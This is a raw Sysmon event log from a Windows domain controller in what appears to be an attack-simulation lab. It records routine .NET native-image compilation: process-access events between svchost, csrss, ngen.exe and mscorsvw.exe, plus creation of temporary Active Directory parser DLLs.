13:45:59.734{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9301-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.703{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9301-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.703{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9301-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9201-00000000A301}1264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.281{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9201-00000000A301}1264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.281{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9201-00000000A301}1264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.250{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9101-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.250{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9101-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.250{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9101-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:59.234{59A5CD1D-9117-6005-9001-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6d8-0\Microsoft.ActiveDirectory.TRLParserInterop.dll2021-01-18 13:45:59.234 10341000x80000000000000005826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.203{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9001-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.188{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9001-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.188{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9001-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.156{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-8F01-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.156{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-8F01-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.156{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-8F01-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:59.141{59A5CD1D-9117-6005-8E01-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4a4-0\TRLParserCOMInterface.dll2021-01-18 13:45:59.141 10341000x80000000000000005819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-8E01-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.109{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-8E01-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.109{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-8E01-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-8D01-00000000A301}3792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.078{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-8D01-00000000A301}3792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.078{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-8D01-00000000A301}3792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:59.047{59A5CD1D-9116-6005-8C01-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\538-0\Microsoft.ActiveDirectory.TRLParser.dll2021-01-18 13:45:59.047 10341000x80000000000000005854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9118-6005-9901-00000000A301}4876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.562{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9118-6005-9901-00000000A301}4876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9118-6005-9901-00000000A301}4876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscor